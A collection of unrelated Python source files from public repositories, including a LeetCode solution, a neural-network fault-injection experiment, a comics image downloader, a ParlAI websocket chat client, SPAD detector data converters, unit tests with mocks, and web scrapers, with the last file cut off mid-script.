def maxProfit(self, prices: List[int]) -> int:
# add up the difference between all local valleys and peaks
profit = 0
for i in range(1, len(prices)):
prev = prices[i-1]
current = prices[i]
if current > prev:
profit += current - prev
return profit
| korynewton/code-challenges | leetcode/BestTimeToBuySell2/solution.py | solution.py | py | 353 | python | en | code | 0 | github-code | 36 |
11306283317 | import sys
import numpy as np
from tensorflow.keras.applications import VGG16
from tensorflow.keras.applications.vgg16 import preprocess_input
from FaultInjector.StuckAtFaultInjector import StuckAtFaultInjector
from RunManager.NetworkManager import NetworkManager
from FaultDetector.FaultDetectorMetrics import FaultDetectorMetrics
from FaultDetector.ScoreBasedFaultDetector import ScoreBasedFaultDetector
from FaultDetector.MavFaultDetector import MavFaultDetector
from FaultDetector.FaultDetectorEvaluator import FaultDetectorEvaluator
if __name__ == "__main__":
# Testing_dir: The folder where the testing dataset using to perform the inference. This is used to compute how much
# a fault impacts a run
# Detection_dir: The folder containing the detection dataset used to compute the metrics useful for the fault
# detectors.
testing_dir = sys.argv[1]
detection_dir = sys.argv[2]
# mav_dir: where to load/save the file containing the mean activation vector for the detection dataset.
# threshold_dir: where to load/save the file containing the threshold for the detection dataset.
mav_file_location = sys.argv[3]
# threshold_file_location = sys.argv[4]
number_of_experiments = 1000
batch_size = 128
top_n = 5
output_format = 'pickle'
number_of_faults_list = [25, 50, 75, 100, 125]
max_fault_list_length = 1000
generator_seed = 1234
generator = np.random.default_rng(generator_seed)
list_beginning = 0
list_end = 100
seed_list = generator.choice(int(10e6), size=number_of_experiments, replace=False)
seed_list = seed_list[list_beginning: list_end]
# STEP 1 - Golden Run
# 1.1 - Create the network
vgg = VGG16(classifier_activation=None)
vgg.compile(metrics=['accuracy'])
# 1.2 - Initialize the network manager
network_manager = NetworkManager(network=vgg, dataset_dir=testing_dir)
# 1.3 - Initialize the fault detector metrics
metrics = FaultDetectorMetrics(network=vgg, dataset_dir=detection_dir)
open_max_activation_vectors = metrics.compute_mean_activation_vectors(file_location=f'{mav_file_location}/mav.pkl',
pre_processing_function=preprocess_input)
open_max_distances = metrics.compute_mav_distance(mav=open_max_activation_vectors,
file_location=f'{mav_file_location}/distance.pkl',
pre_processing_function=preprocess_input)
open_max_weibull = metrics.fit_weibull(open_max_distances,
tail_size=20)
# score_based_threshold = metrics.compute_score_based_threshold(file_location=threshold_file_location,
# pre_processing_function=preprocess_input)
# 1.4 - Execute the golden run
print(f'Starting golden run... \n')
network_manager.run_and_export(run_name=f'vgg_imagenet',
output_dir='GoldenRunResults-OpenMax',
top_n=top_n,
output_format=output_format,
pre_processing_function=preprocess_input,
open_max_activation_vectors=open_max_activation_vectors,
open_max_weibull=open_max_weibull)
network_manager.save_golden_results()
# STEP 2 - Faulty Run
for count, seed in enumerate(seed_list):
print(f'Beginning run #{count} of {len(seed_list)}.\n')
# 2.1 - reset the network to its original state (i.e. load the original weights)
network_manager.reset_network()
# 2.2 - Initialize the fault injector
fault_injector = StuckAtFaultInjector(vgg, seed)
# 2.3 - Generate a fault list and perform a fault injection campaign for the number of faults in the list
for number_of_faults in number_of_faults_list:
fault_injector.fault_injection_campaign(number_of_faults=number_of_faults,
folder_path='FaultList',
fault_list_length=max_fault_list_length)
# 2.4 - Execute a faulty run
print(f'Starting faulty run {seed}_{number_of_faults}... \n')
inference_results = network_manager.run_and_export(run_name=f'vgg_imagenet_{seed}_{number_of_faults}',
output_dir='FaultyRunResults-OpenMax',
top_n=top_n,
compute_sdc_metrics=True,
output_format=output_format,
pre_processing_function=preprocess_input,
open_max_activation_vectors=open_max_activation_vectors,
open_max_weibull=open_max_weibull)
# 2.5 - Initialize the fault detectors
# score_based_fault_detector = ScoreBasedFaultDetector(inference_result=inference_results,
# threshold=score_based_threshold)
# mav_fault_detector = MavFaultDetector(inference_result=inference_results,
# threshold=open_max_threshold)
# 2.6 - Run the fault detectors
# score_based_fault_detector_results = score_based_fault_detector.detect_faults()
# mav_fault_detector_results = mav_fault_detector.detect_faults()
# 2.7 - Evaluate the performance of the fault detectors
# score_based_evaluation = FaultDetectorEvaluator.evaluate_and_export_fault_detector(
# fault_detector_dict=score_based_fault_detector_results,
# run_sdc=inference_results,
# file_name=f'vgg_imagenet_{seed}_{number_of_faults}_score_based',
# output_dir='FaultDetectorResults')
# mav_evaluation = FaultDetectorEvaluator.evaluate_and_export_fault_detector(
# fault_detector_dict=mav_fault_detector_results,
# run_sdc=inference_results,
# file_name=f'vgg_imagenet_{seed}_{number_of_faults}_mav',
# output_dir='FaultDetectorResults')
| GabrieleGavarini/FaultInjector | main.py | main.py | py | 6,630 | python | en | code | 1 | github-code | 36 |
24739226033 | from fastapi import APIRouter
from app.api.segmentation import doc_parser, paddle
from app.core.config import settings
from app.schemas.doc_parser import ImageInput, ImageOutput
router = APIRouter(prefix="/segment", tags=["segment"])
@router.post("/detect-image")
async def doc_parser_api(*, img_in: ImageInput):
# print("requesting `doc_parser_api`")
return await doc_parser.detect_image(img_in)
@router.post("/detect-text")
async def paddle_api(*, img_in: ImageInput):
# print("requesting `paddle_text_api`")
return await paddle.detect_text(img_in)
@router.post("/detect-bitmap")
async def paddle_bitmap_api(*, img_in: ImageInput):
# print("requesting `paddle_bitmap_api`")
return await paddle.db_detect_bitmap(img_in)
@router.post("/detect-text-fast")
async def paddle_math_api(*, img_in: ImageInput):
# print("requesting `detect_text_fast`")
return await paddle.detect_text_fast(img_in)
| rednam-ntn/dosa | server/app/api/__init__.py | __init__.py | py | 933 | python | en | code | 1 | github-code | 36 |
35918965719 | import contextlib
import hashlib
import httplib
import socket
import tempfile
import urllib2
try:
from PIL import Image as PILImage
except ImportError:
import Image as PILImage # noqa
from django.conf import settings
from django.core.files import File
from django.db import transaction
from comics.aggregator.exceptions import (
DownloaderHTTPError, ImageTypeError, ImageIsCorrupt, ImageAlreadyExists,
ImageIsBlacklisted)
from comics.core.models import Release, Image
# Image types we accept, and the file extension they are saved with
IMAGE_FORMATS = {
'GIF': '.gif',
'JPEG': '.jpg',
'PNG': '.png',
}
class ReleaseDownloader(object):
def download(self, crawler_release):
images = self._download_images(crawler_release)
return self._create_new_release(
crawler_release.comic, crawler_release.pub_date, images)
def _download_images(self, crawler_release):
image_downloader = ImageDownloader(crawler_release)
return map(image_downloader.download, crawler_release.images)
@transaction.commit_on_success
def _create_new_release(self, comic, pub_date, images):
release = Release(comic=comic, pub_date=pub_date)
release.save()
for image in images:
release.images.add(image)
return release
class ImageDownloader(object):
def __init__(self, crawler_release):
self.crawler_release = crawler_release
def download(self, crawler_image):
self.identifier = self.crawler_release.identifier
with self._download_image(
crawler_image.url, crawler_image.request_headers
) as image_file:
checksum = self._get_sha256sum(image_file)
self.identifier = '%s/%s' % (self.identifier, checksum[:6])
self._check_if_blacklisted(checksum)
existing_image = self._get_existing_image(
comic=self.crawler_release.comic,
has_rerun_releases=self.crawler_release.has_rerun_releases,
checksum=checksum)
if existing_image is not None:
return existing_image
image = self._validate_image(image_file)
file_extension = self._get_file_extension(image)
file_name = self._get_file_name(checksum, file_extension)
return self._create_new_image(
comic=self.crawler_release.comic,
title=crawler_image.title,
text=crawler_image.text,
image_file=image_file,
file_name=file_name,
checksum=checksum)
def _download_image(self, url, request_headers):
try:
request = urllib2.Request(url, None, request_headers)
with contextlib.closing(urllib2.urlopen(request)) as http_file:
temp_file = tempfile.NamedTemporaryFile(suffix='comics')
temp_file.write(http_file.read())
temp_file.seek(0)
return temp_file
except urllib2.HTTPError as error:
raise DownloaderHTTPError(self.identifier, error.code)
except urllib2.URLError as error:
raise DownloaderHTTPError(self.identifier, error.reason)
except httplib.BadStatusLine:
raise DownloaderHTTPError(self.identifier, 'BadStatusLine')
except socket.error as error:
raise DownloaderHTTPError(self.identifier, error)
def _get_sha256sum(self, file_handle):
original_position = file_handle.tell()
hash = hashlib.sha256()
while True:
data = file_handle.read(8096)
if not data:
break
hash.update(data)
file_handle.seek(original_position)
return hash.hexdigest()
def _check_if_blacklisted(self, checksum):
if checksum in settings.COMICS_IMAGE_BLACKLIST:
raise ImageIsBlacklisted(self.identifier)
def _get_existing_image(self, comic, has_rerun_releases, checksum):
try:
image = Image.objects.get(comic=comic, checksum=checksum)
if image is not None and not has_rerun_releases:
raise ImageAlreadyExists(self.identifier)
return image
except Image.DoesNotExist:
return None
def _validate_image(self, image_file):
try:
image = PILImage.open(image_file)
image.load()
return image
except IndexError:
raise ImageIsCorrupt(self.identifier)
except IOError as error:
raise ImageIsCorrupt(self.identifier, error.message)
def _get_file_extension(self, image):
if image.format not in IMAGE_FORMATS:
raise ImageTypeError(self.identifier, image.format)
return IMAGE_FORMATS[image.format]
def _get_file_name(self, checksum, extension):
if checksum and extension:
return '%s%s' % (checksum, extension)
@transaction.commit_on_success
def _create_new_image(
self, comic, title, text, image_file, file_name, checksum):
image = Image(comic=comic, checksum=checksum)
image.file.save(file_name, File(image_file))
if title is not None:
image.title = title
if text is not None:
image.text = text
image.save()
return image
| macanhhuy/comics | comics/aggregator/downloader.py | downloader.py | py | 5,379 | python | en | code | null | github-code | 36 |
74050008424 | import json
import uuid
import websocket
import time
import threading
from parlai.core.params import ParlaiParser
# the socket callback functions operate asynchronously.
# upon exit of a chat, we do not want the user to view any additional messages from the server.
# alas, it is necessary to send two messages ([DONE], and EXIT) in order to fully exist the world pool
# to prevent receiving a message after sending [DONE], we track the user's state with
# this global variable.
RUNNING = True
def _get_rand_id():
"""
:return: The string of a random id using uuid4
"""
return str(uuid.uuid4())
def _prBlueBG(text):
"""
Print given in text with a blue background.
:param text: The text to be printed
"""
print("\033[44m{}\033[0m".format(text), sep="")
def on_message(ws, message):
"""
Prints the incoming message from the server.
:param ws: a WebSocketApp
:param message: json with 'text' field to be printed
"""
if not RUNNING:
return
incoming_message = json.loads(message)
print("\033[0m\n")
print("Bot: " + incoming_message['text'])
quick_replies = incoming_message.get('quick_replies')
if quick_replies is not None and len(quick_replies) > 0:
print(f"\nOptions: [{'|'.join(quick_replies)}]")
print("\033[44m\n")
def on_error(ws, error):
"""
Prints an error, if occurs.
:param ws: WebSocketApp
:param error: An error
"""
print(error)
def on_close(ws):
"""
Cleanup before closing connection.
:param ws: WebSocketApp
"""
# Reset color formatting if necessary
print("\033[0m")
print("Connection closed")
def _run(ws, id):
"""
Takes user input and sends it to a websocket.
:param ws: websocket.WebSocketApp
"""
global RUNNING
while True:
x = input("\033[44m Me: ")
print("\033[0m", end="")
data = {}
data['id'] = id
data['text'] = x
if x == "[DONE]":
RUNNING = False
json_data = json.dumps(data)
ws.send(json_data)
time.sleep(1)
if x == "[DONE]":
time.sleep(1)
data['text'] = 'EXIT'
ws.send(json.dumps(data))
break
ws.close()
def on_open(ws):
"""
Starts a new thread that loops, taking user input and sending it to the websocket.
:param ws: websocket.WebSocketApp that sends messages to a terminal_manager
"""
id = _get_rand_id()
threading.Thread(target=_run, args=(ws, id)).start()
def setup_args():
"""
Set up args, specifically for the port number.
:return: A parser that parses the port from commandline arguments.
"""
parser = ParlaiParser(False, False)
parser_grp = parser.add_argument_group('Terminal Chat')
parser_grp.add_argument(
'--port', default=35496, type=int, help='Port to run the terminal chat server'
)
parser_grp.add_argument(
'--host', default='localhost', type=str, help='Host to connect to.'
)
return parser.parse_args()
if __name__ == "__main__":
opt = setup_args()
port = opt.get('port', 34596)
host = opt.get('host', 'localhost')
print("Connecting to port: ", port)
ws = websocket.WebSocketApp(
f"ws://{host}:{port}/websocket",
on_message=on_message,
on_error=on_error,
on_close=on_close,
)
ws.on_open = on_open
ws.run_forever()
| facebookresearch/ParlAI | parlai/chat_service/services/terminal_chat/client.py | client.py | py | 3,446 | python | en | code | 10,365 | github-code | 36 |
30330065701 | import numpy as np
import os
import argparse
import h5py
import sys
from spad_tools.listFiles import listFiles
from spad_tools.array2tiff import array2tiff, array2RGBtiff
from spad_tools.getFCSinfo import getFileInfo
from libttp import ttp
"""
This set of functions allows to read a binary file containing SPAD measurements
using only the file name. The parameters are extracted from the matrix using
the tags. The assumpstion is that the parameters are constant and that all the
frames are complete.
Author: Sebastian Acuna
"""
def file_to_count(fname, datatype=np.uint16, printInfo=False):
"""
Read a bin file and returns an array with the decoded count for each measurement
Args:
fname: name of the file containing the data
Returns:
A numpy array of unsigned int16 os size N x 25 where N is the number of measurements
"""
try:
raw = np.fromfile(fname, dtype=">u8")
except:
if printInfo:
print("Error reading binary file")
return None
elements = raw.shape[0]
positions = int(elements/2)
raw_pos = np.reshape(raw, (positions, 2))
if printInfo:
print(f"Elements: {elements}")
print(f"Positions: {positions}")
print(f"data table: {raw_pos.shape}")
time_per_pixel_tag = np.bitwise_and(raw_pos[:,1], 0b1)
idx = np.argmax(time_per_pixel_tag != time_per_pixel_tag[0]) # positions per time
time_per_pixel = int(idx)
if printInfo:
print(f"time per pixel: {time_per_pixel}")
frame_tag = np.bitwise_and(np.right_shift(raw_pos[:,1], 2), 0b1)
idx = np.argmax(frame_tag != frame_tag[0]) # positions per frame
if idx == 0:
if printInfo:
print("Unique frame")
frames = 1
else:
frames = int(positions/idx) # TODO: check condition with larger dataset
line_tag = np.bitwise_and(np.right_shift(raw_pos[:,1], 1), 0b1)
idx = int(np.argmax(line_tag != line_tag[0])/time_per_pixel) # positions per line
if printInfo:
print(f"Positions per lines: {idx}")
x = int(idx)
y = int(positions/x/time_per_pixel/frames)
if printInfo:
print(f"Dimensions: Y:{y}, X:{x}")
out = np.zeros((positions , 25), dtype = datatype)
matrix_to_count(raw_pos, out)
return out, frames, y, x, time_per_pixel
def file_to_FCScount(fname, datatype=np.uint16, Npoints=-1, Noffset=0):
"""
Read a bin file and returns an array with the decoded count for each measurement
Args:
fname: name of the file containing the data
Returns:
A numpy array of unsigned int16 os size N x 25 where N is the number of measurements
"""
try:
Npoints = Npoints * 2
NbytesOffset = 16 * Noffset
raw = np.fromfile(fname, dtype=">u8", count=Npoints, offset=NbytesOffset)
except:
print("Error reading binary file")
return None
elements = raw.shape[0]
print(f"Elements: {elements}")
positions = int(elements/2)
print(f"Positions: {positions}")
print("Freeing memory")
out = np.zeros((positions , 25), dtype = datatype)
print("Done.")
raw_pos = np.reshape(raw, (positions, 2))
print(f"data table: {raw_pos.shape}")
print("Converting data to counts")
matrix_to_count(raw_pos, out)
print("Done.")
return out
def matrix_to_count(values, out):
"""
Read an array of N measurements and write the count values in the out
array
Args:
values: N x 2 unsigned int array with measurements
out: N x 25 unsigned int array for storing results
Returns:
The matrix out filled with the count
"""
out[:,0] = np.bitwise_and(np.right_shift(values[:,0], 64 - 59), 0b1111) # 4 bits
out[:,1] = np.bitwise_and(np.right_shift(values[:,0], 64 - 55), 0b1111) # 4 bits
out[:,2] = np.bitwise_and(np.right_shift(values[:,0], 64 - 51), 0b1111) # 4 bits
out[:,3] = np.bitwise_and(np.right_shift(values[:,0], 64 - 47), 0b1111) # 4 bits
out[:,4] = np.bitwise_and(np.right_shift(values[:,0], 64 - 43), 0b1111) # 4 bits
out[:,5] = np.bitwise_and(np.right_shift(values[:,0], 64 - 39), 0b1111) # 4 bits
out[:,6] = np.bitwise_and(np.right_shift(values[:,1], 64 - 59), 0b11111) # 5 bits
out[:,7] = np.bitwise_and(np.right_shift(values[:,1], 64 - 54), 0b111111) # 6 bits
out[:,8] = np.bitwise_and(np.right_shift(values[:,1], 64 - 48), 0b11111) # 5 bits
out[:,9] = np.bitwise_and(np.right_shift(values[:,1], 64 - 43), 0b1111) # 4 bits
out[:,10] = np.bitwise_and(np.right_shift(values[:,1], 64 - 39), 0b1111) # 4 bits
out[:,11] = np.bitwise_and(np.right_shift(values[:,1], 64 - 35), 0b111111) # 6 bits
out[:,12] = np.bitwise_and(np.right_shift(values[:,1], 64 - 29), 0b1111111111) # 10 bits
out[:,13] = np.bitwise_and(np.right_shift(values[:,1], 64 - 19), 0b111111) # 6 bits
out[:,14] = np.bitwise_and(np.right_shift(values[:,1], 64 - 13), 0b1111) # 4 bits
out[:,15] = np.bitwise_and(np.right_shift(values[:,1], 64 - 9), 0b1111) # 4 bits
out[:,16] = np.right_shift(values[:,1], 64 - 5) # 5 bits
out[:,17] = np.bitwise_and(np.right_shift(values[:,0], 64 - 35), 0b111111) # 6 bits
out[:,18] = np.bitwise_and(np.right_shift(values[:,0], 64 - 29), 0b11111) # 5 bits
out[:,19] = np.bitwise_and(np.right_shift(values[:,0], 64 - 24), 0b1111) # 4 bits
out[:,20] = np.bitwise_and(np.right_shift(values[:,0], 64 - 20), 0b1111) # 4 bits
out[:,21] = np.bitwise_and(np.right_shift(values[:,0], 64 - 16), 0b1111) # 4 bits
out[:,22] = np.bitwise_and(np.right_shift(values[:,0], 64 - 12), 0b1111) # 4 bits
out[:,23] = np.bitwise_and(np.right_shift(values[:,0], 64 - 8), 0b1111) # 4 bits
out[:,24] = np.bitwise_and(np.right_shift(values[:,0], 64 - 4), 0b1111) # 4 bits
def reshape_to_5d(count, frames, y, x, time_per_pixel):
"""
Reshapes the 2D count matrix to a 5D array (frames, y, x, time, sensor)
Args:
count: N x 25 count matrix
frames: number of frames contained in matrix
y:
x:
time:
Returns:
A 5-D matrix with dimensions (frames, y, x, time, sensor)
"""
return np.reshape(count, (frames, y, x, time_per_pixel, 25))
def reshape_to_6d(count, r, z, y, x, t=1, c=25):
"""
Reshapes the data to a 6D array
Args:
count: N x 25 count matrix
frames: number of frames contained in matrix
y:
x:
time:
Returns:
A 6-D matrix with dimensions (r, z, y, x, time, sensor)
"""
return np.reshape(count, (r, z, y, x, t, 25))
def image2h5(fname, sumTime=True, saveTimeInd=False):
"""
Convert bin file to h5 file
fname file name
sumTime True to sum over all time bins, false otherwise
saveTimeInd Save all time frames in separate files
TO DO:
add metadata to file:
data.pixelsize = 0.05
data.pixelsizeU = 'um', etc.
"""
print(fname)
[out, frames, y, x, time_per_pixel] = file_to_count(fname)
data = reshape_to_5d(out, frames, y, x, time_per_pixel)
if np.ndim(data) == 4 and frames == 1 and sumTime:
# 4D data set [y, x, time, ch] --> sum over time bins
dataOut = np.sum(data, 2)
dataOut = np.float64(dataOut)
# channel must be first channel
dataOut = np.transpose(dataOut, (2, 0, 1))
elif np.ndim(data) == 5 and sumTime:
# 5D data set [z, y, x, time, ch] --> sum over time bins
dataOut = np.sum(data, 3)
dataOut = np.float64(dataOut)
dataOut = np.transpose(dataOut, (3, 0, 1, 2))
else:
print('not summed over time bins')
# channel must be first channel
dataOut = np.squeeze(data)
if saveTimeInd:
dataOut = np.transpose(dataOut, (3, 0, 1, 2))
dataOut = np.squeeze(dataOut)
if type(saveTimeInd) == bool and saveTimeInd:
for i in range(np.shape(dataOut)[-1]):
print("Saving frame " + str(i))
h5f = h5py.File(fname[:-4] + "_frame_" + str(i) + ".h5", 'w')
h5f.create_dataset('dataset_1', data=dataOut[:,:,:,i])
h5f.close()
elif saveTimeInd == "alternate":
# channel, y, x, time
Nt = np.shape(dataOut)[-1]
for sumT in range(int(Nt/2)):
print("Summing over " + str(sumT+1) + " frames")
dataOutSum0 = np.squeeze(np.sum(dataOut[:,:,:,0:2*sumT+1:2], 3))
dataOutSum1 = np.squeeze(np.sum(dataOut[:,:,:,1:2*sumT+2:2], 3))
# store frame 0
h5f = h5py.File(fname[:-4] + "_sum_" + str(sumT+1) + "_frame_0.h5", 'w')
h5f.create_dataset('dataset_1', data=dataOutSum0)
h5f.close()
# store frame 1
h5f = h5py.File(fname[:-4] + "_sum_" + str(sumT+1) + "_frame_1.h5", 'w')
h5f.create_dataset('dataset_1', data=dataOutSum1)
h5f.close()
else:
h5f = h5py.File(fname[:-3] + "h5", 'w')
h5f.create_dataset('dataset_1', data=dataOut)
h5f.close()
return dataOut
def ttr2h5(fnamettr, reorder25channels=True, CHANNELS=25, laser_MHz=80.0, dwell_time_us=10):
df = ttp.readNewProtocolFileToPandas(fnamettr, reorder25channels=reorder25channels, CHANNELS=CHANNELS)
ttp.convertFromPandasDataFrame(df, fnamettr[:-4] + '.h5', laser_MHz=laser_MHz, dwell_time_us=dwell_time_us, list_of_channels=list(np.arange(CHANNELS)))
def allTtr2h5(folder=''):
files = listFiles(folder, filetype='ttr')
filesh5 = listFiles(folder, filetype='h5')
for i, file in enumerate(filesh5):
filesh5[i] = file[:-3] + '.ttr'
for file in files:
if file not in filesh5:
print("converting " + file)
ttr2h5(file)
print('Done')
def bin2h5(fname):
"""
Convert bin file to h5 file with always 6D (r, z, x, y, t, c)
fname file name
add metadata to file:
data.pixelsize = 0.05
data.pixelsizeU = 'um', etc.
"""
[out, frames, y, x, time_per_pixel] = file_to_count(fname)
data = reshape_to_6d(out, 1, frames, y, x, time_per_pixel, 25)
# store data
h5f = h5py.File(fname[:-4] + ".h5", 'w')
h5f.create_dataset('dataset_1', data=data)
h5f.close()
print('Done')
def allBinImages2tiff(folder):
"""
Convert all bin files in a folder to tiff images
folder path to folder (use either \\ or / to go into a folder)
"""
files = listFiles(folder)
for file in files:
print("saving " + file)
dummy = image2tiff(file)
def image2tiff(fname):
"""
Convert bin file to tiff image file
fname file name
"""
[out, frames, y, x, time_per_pixel] = file_to_count(fname)
data = reshape_to_5d(out, frames, y, x, time_per_pixel)
print(np.shape(data))
info = getFileInfo(fname[:-4] + '_info.txt')
if np.ndim(data) == 4 and frames == 1:
# 4D data set [y, x, time, ch] --> sum over time bins
dataOut = np.sum(data, 2)
elif np.ndim(data) == 5:
# 5D data set [z, y, x, time, ch] --> sum over time bins and z
dataOut = np.sum(data, 3)
dataOut = np.sum(dataOut, 0)
dataOut = np.float64(dataOut)
dataOut = np.squeeze(dataOut)
print(np.shape(dataOut))
array2tiff(dataOut, fname[:-4], pxsize=info.pxsize, dim="yxz", transpose3=True)
array2RGBtiff(np.sum(dataOut, 2), fname[:-4] + '_RGB')
def allBinImages2h5(folder, sumTime=True, saveTimeInd=False):
"""
Convert all bin files in a folder to h5 files
folder path to folder (use either \\ or / to go into a folder)
sumTime True to sum over all time bins, false otherwise
"""
files = listFiles(folder)
for file in files:
print("converting " + file)
dummy = image2h5(file, sumTime, saveTimeInd)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Converter from binary file to measurement matrix"
)
parser.add_argument(
"binary",
help="binary file name")
args = parser.parse_args()
fname = args.binary
count, frames, y, x, time_per_pixel = file_to_count(fname)
if count is None:
print("Failed to process data. Closing.")
sys.exit(0)
file_name, extension = os.path.splitext(fname) # Get filename without extension
print("Saving 5D matrix...", sep="")
count5d = reshape_to_5d(count, frames, y, x, time_per_pixel)
np.save(file_name + ".npy", count5d)
print("Done.")
| VicidominiLab/libspadffs | spad_fcs/meas_to_count.py | meas_to_count.py | py | 12,651 | python | en | code | 0 | github-code | 36 |
7392241864 |
import argparse
from . import board
from . import constants
from . import solver
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("board", nargs="?")
parser.add_argument("-m", "--manual", default=False, action="store_true")
return parser.parse_args()
def main():
args = parse_args()
if not args.board:
main_board = board.Board(constants.TEST_BOARD)
else:
main_board = board.Board(args.board)
# print(tile.Tile.get((1, 1)).render())
# print(tile.Tile.get((2, 2)).render())
# print(main_board.render())
s = solver.Solver(main_board, manual=args.manual)
s.solve()
if __name__ == '__main__':
main()
| MattCCS/SudokuSolver | sudoku.py | sudoku.py | py | 698 | python | en | code | 0 | github-code | 36 |
11984682489 | class Subscriber:
def __init__(self):
self.clients = []
def add(self, name, email):
for client in self.clients:
if client["name"] == name and client["email"] == email:
raise Exception("This client exists")
if type(name) == str and type(email) == str:
self.clients.append({"name": name, "email": email})
return self.clients
else:
raise TypeError("Bad type name or/and email")
def delete(self, name, email):
for client in self.clients:
if client["name"] == name and client["email"] == email:
self.clients.remove({"name": name, "email": email})
return "Delete: %s, email: %s" % (name, email)
raise Exception("Lack client")
def sendMessage(self, email, textMessage):
for client in self.clients:
if client["email"] == email:
if type(textMessage) == str:
return "Send message to %s" % email
else:
raise TypeError("Type text message have to be string")
raise Exception("No client has this email")
from unittest.mock import *
from unittest import TestCase, main
class testSubscriber(TestCase):
def setUp(self):
self.temp = Subscriber()
def test_add_client_OK(self):
self.temp.add = Mock()
self.temp.add.return_value = [{"name": "Piotr", "email": "piotrnowak@example.com"}]
result = self.temp.add("Piotr", "piotrnowak@example.com")
self.assertListEqual(result, [{"name": "Piotr", "email": "piotrnowak@example.com"}])
def test_add_client_BAD_exists(self):
self.temp.add = Mock()
self.temp.clients = [{"name": "Piotr", "email": "piotrnowak@example.com"}]
self.temp.add.side_effect = Exception("This client exists")
result = self.temp.add
self.assertRaisesRegex(Exception, "This client exist", result, "Piotr", "piotrnowak@example.com")
def test_add_client_BAD_name(self):
self.temp.add = Mock()
self.temp.add.side_effect = TypeError("Bad type name or/and email")
result = self.temp.add
self.assertRaisesRegex(TypeError, "Bad type name or/and email", result, 123, "piotrnowak@example.com")
def test_delete(self):
self.temp.delete = Mock()
self.temp.clients = [{"name": "Wiktoria", "email": "wolnikowa@example.com"},
{"name": "Kasia", "email": "kasiapolak@example.com"}]
self.temp.delete.return_value = "Delete: Wiktoria, email: wolnikowa@example.com"
result = self.temp.delete("Wiktoria", "wolnikowa@example.com")
self.assertEqual(result, "Delete: Wiktoria, email: wolnikowa@example.com")
def test_delete_client_lack_client(self):
self.temp.delete = Mock()
self.temp.clients = [{"name": "Wiktoria", "email": "wolnikowa@example.com"},
{"name": "Kasia", "email": "kasiapolak@example.com"}]
self.temp.delete.side_effect = Exception("Lack client")
result = self.temp.delete
self.assertRaisesRegex(Exception, "Lack client", result, "Filip", "filipostrowski@example.com")
def test_send_message(self):
self.temp.sendMessage = Mock()
self.temp.clients = [{"name": "Wiktoria", "email": "wolnikowa@example.com"},
{"name": "Kasia", "email": "kasiapolak@example.com"}]
self.temp.sendMessage.return_value = "Send message to kasiapolak@example.com"
result = self.temp.sendMessage("kasiapolak@example.com", "Hello")
self.assertEqual(result, "Send message to kasiapolak@example.com")
def test_send_message_bad_type_message(self):
self.temp.sendMessage = Mock()
self.temp.clients = [{"name": "Wiktoria", "email": "wolnikowa@example.com"},
{"name": "Kasia", "email": "kasiapolak@example.com"}]
self.temp.sendMessage.side_effect = TypeError("Type text message have to be string")
result = self.temp.sendMessage
self.assertRaisesRegex(TypeError, "Type text message have to be string", result, "kasiapolak@example.com",
False)
def test_send_message_clients_BAD_email(self):
self.temp.sendMessage = Mock()
self.temp.clients = [{"name": "Wiktoria", "email": "wolnikowa@example.com"},
{"name": "Kasia", "email": "kasiapolak@example.com"}]
self.temp.sendMessage.side_effect = Exception("No client has this email")
result = self.temp.sendMessage
self.assertRaisesRegex(Exception, "No client has this email", result, "bartekkowalslki@example.com", "Hello")
if __name__ == '__main__':
main() | TestowanieAutomatyczneUG/laboratorium-12-wolnikowa | .github/src/zad2.py | zad2.py | py | 4,782 | python | en | code | 0 | github-code | 36 |
42300807705 | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
url = ''
driver = webdriver.Chrome()
driver.get(url)
element_founder = driver.find_element_by_name('q')
element_founder.send_keys('selenium')
element_founder.send_keys(Keys.RETURN)
results = driver.find_elements_by_css_selector('h3 > a')
for result in results:
print(result.text)
| seriybeliy11/parsers | sel_parser.py | sel_parser.py | py | 380 | python | en | code | 0 | github-code | 36 |
26284873290 | # To sort an array considering it as a nearly complete binary tree and then sorting it using max heapify
def max_heapify(mh, idx):
left = (idx << 1) + 1
right = (idx + 1) << 1
largest = idx
if left < len(mh) and mh[left] > mh[largest]:
largest = left
if right < len(mh) and mh[right] > mh[largest]:
largest = right
if largest != idx:
mh[idx], mh[largest] = mh[largest], mh[idx]
max_heapify(mh, largest)
def build_max_heap(mh):
n = len(mh)//2
for i in range(n, -1, -1):
max_heapify(mh, i)
def heap_sort(mh):
y = []
while len(mh) > 0:
n = len(mh) - 1
build_max_heap(mh)
mh[0], mh[n] = mh[n], mh[0]
y.append(mh[n])
mh.pop(n)
max_heapify(mh, 0)
return y
| deveshaggrawal19/projects | Algorithms/Searching and Sorting/Heap_Sort.py | Heap_Sort.py | py | 822 | python | en | code | 0 | github-code | 36 |
20928709222 | #!/usr/bin/env python
# coding: utf-8
# In[6]:
import time
import json
import pandas as pd
import re
import logging
from datetime import date, datetime, timedelta
from selenium import webdriver
from selenium.webdriver.firefox.service import Service
from selenium.webdriver.common.by import By
from webdriver_manager.chrome import ChromeDriverManager
opts=webdriver.ChromeOptions()
opts.headless=False
driver = webdriver.Chrome(ChromeDriverManager().install() ,options=opts)
def date_extract(jobs):
filtered_data=[]
for value in jobs:
if not value:
filtered_data.append(str(date.today()))
else:
for item in value:
integer_value=int(str(item))
dt=date.today()-timedelta(integer_value)
filtered_data.append(str(dt))
return filtered_data
def get_df_from_dict(jobs):
df=pd.DataFrame.from_dict(jobs) #Creating DataFrame
df.head(10)
df=df.apply(lambda x: x.astype(str).str.lower()) #converting into lowercase to remove redundancy
df.head()
#df.skills=[skill.split("\n") for skill in df.skills]
df.location=[location.split(" ") for location in df.location]
df=df.dropna()
return df
def task_scrape():
jobs={"title":[],
"company":[],
"experience":[],
#"skills":[],
"date":[],
"scraper_run_dt_time":[],
"location":[]
#"jd_url":[]
}
final_df=pd.DataFrame(jobs)
#This outer loop is for number of pages to be scraped
#for role in data["job_roles"]:
# jobs={key:[] for key in jobs}
#print("hello",jobs)
for n in range(1,4):
driver.get('https://www.naukri.com/software-engineer-software-developer-data-analyst-data-scientist-machine-learning-engineer-hr-manager-project-manager-cloud-architect-full-stack-developer-full-stack-web-developer-big-data-consultant-jobs-'+str(n)+'?k=Software%20Engineer%2C%20Software%20Developer%2C%20Data%20Analyst%2C%20Data%20Scientist%2C%20Machine%20Learning%20Engineer%2C%20HR%20Manager%2C%20Project%20Manager%2C%20Cloud%20Architect%2C%20Full%20Stack%20Developer%2C%20Full%20Stack%20Web%20Developer%2C%20Big%20Data%20Consultant')
